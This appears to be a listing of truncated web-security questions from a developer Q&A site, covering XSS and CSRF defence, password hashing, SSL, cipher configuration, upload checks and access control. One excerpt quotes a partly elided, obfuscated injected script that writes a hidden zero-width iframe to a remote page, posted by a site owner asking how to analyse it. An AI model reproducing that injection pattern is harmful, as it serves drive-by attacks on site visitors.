3 years ago I did a security audit for a large ecommerce website. When the audit was preformed I found several severe security issues that allow for access to data that should not be accessible after a transaction is completed. On this site there are several major risks. First you can see orders coming through the system real time; all t...
I am working on a tool that accepts an html string, downloads any images found in the code and replaces the image sources with the new local urls. When an image source redirects to another url, I get an access denied error on the request for it: msxml3.dll error '80070005' Access is denied. (i.e. Original URL is: http://ads.cpafuel....
I would like to secure an ASP.NET web application against hacking. Is there a list of ASP.NET specific tasks specifically coding wise to make an ASP.NET more secure? Beyond what is mentioned on MSDN. I am interested in specific steps with code examples on ways to avoid cross site request forgeries & cross site scripting. I know about u...
I noticed in this article that Microsoft does not recommend using the Editor control from the Ajax Control Toolkit in public sites because of the danger of cross-site scripting attacks. I tried it out, and even if you specifically set NoScript="true" it's possible to add script, and therefore, introduce XSS attack vulnerabilities. In m...
Hello everybody, While trying to debug my openid implementation with Google, which kept returning Apache 406 errors, I in the end discovered that my hosting company does not allow to pass a string containing "/id" as a GET parameter (something like "example.php?anyattribute=%2Fid" once URL encoded). That's rather annoying as Google ope...
For example, if the user has JavaScript enabled, we send hash his password and send the hash. If not, we send the password unhashed and a flag to mark that it is unhashed. We then build the hash (if it's unhashed) and compare it to the stored hash. This seems to be secure and simple. Why isn't it a popular way to send a password? Did I ...
I'm curious to know what what web developers consider to be the biggest security vulnerabilities with regards to Ajax applications, with or without the popular client frameworks (jQuery et al.), and how they are mitigated. Are there open source or commercial tools that can help identify such problems in a site? ...
Hi I am looking into using Facebook connect as a way for users to log in to my site. However I've noticed that it doesn't use SSL. also I've noticed that doesn;t look like SSL is being used in the main facebook login area either. My site holds sensitive info about the user and am concerned that Facebook connect could make this vulnerab...
I am currently working on a project in which we are creating a large public website for my organization. This site is going to allow out clients to register and log in to obtain sensitive personal information. From experience I know some of the basics like requiring a complex password and requiring an email address for a password reset ...
I have just started writing socket programs. Came to know that single UDP packet has source port destination port and some MAC address representing router..etc. I wonder why anybody cannot create custom packets with a fake information in and send it over internet. I would like to know how safe are our PCs. What should be done to secure i...
I have a web application developed in .net 3.5, and a SQL Server database. Current auth method is a connection string in web.config, it seems like a good idea to move the authentication details out of plain text. So, I have two questions: Trusted Connection - The password policy here is strict, requiring frequent changes. Does this m...
I have the following in a GlassFish deployed EAR, which works fine: <security-constraint> <web-resource-collection> <web-resource-name>Secure Pages</web-resource-name> <url-pattern>/restricted/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> ...
I'm having asp.Net barf at me when I submit the a form with a value like <a_ (underscore is a space). This is bad - at the very least I want to be able to gracefully handle the error, ideally I'd like the user to be able to submit anything they like and have it work as the user expects. I could set validateRequest="false" in the web.c...
Hi all, This problem is regarding a JS hijacking scenario, and here it is : Say Mr. Good has a website called "iamtooinnocent.com" which loads a "x.js" file to perform some particular tasks, and Mr. Bad is an evil cyber cafe owner, who has set a redirect rule in place that whenever any surfer using his cyber cafe visits Good's websi...
I'm currently working on a project where users can upload datasets in CSV format. Is there a good way with Ruby other than checking file extension to determine if they're really uploading a CSV and not some executable or some other file type? ...
I have a website, and I just discoverd that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it? <script> var x = unescape("%68% (**** some other hex characters here ****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" ...
Hi all, We are developing a web application using Spring framework and Hibernate ORM. As far as application security is concerned we are using acegi to provide authentication and authorization support. Now about user input sanitation, we have tried to take take care about attacks like XSS and sql injections. We have tried to use as muc...
In your experience, what have you found, worked on, or encountered in terms of site vulnerabilities? And what actions did you take to mitigate these issues? This may include XSS (cross site scripting), SQL Injection attacks, plain old DDOS or phishing attempts on your site's customers. Only yesterday I came across an entire section of ...
Hello. I am attempting to refine the suite of ciphers that my webapp allows. In Tomcat's server.xml I have the following connector defined: <Connector port="443" maxHttpHeaderSize="8192" maxThreads="3000" minSpareThreads="250" maxSpareThreads="500" enableLookups="false" disableUploadTimeout="true" acce...
I'm working with ASP.Net MVC as well as DynamicData and I need to add role-based security. Should I implement this via: IHttpHandler with custom actions that check if the user is authorized? Or should I be using a RoleProvider? Or perhaps some combination of the two? If the RoleProvider is a viable option, when would I ever need t...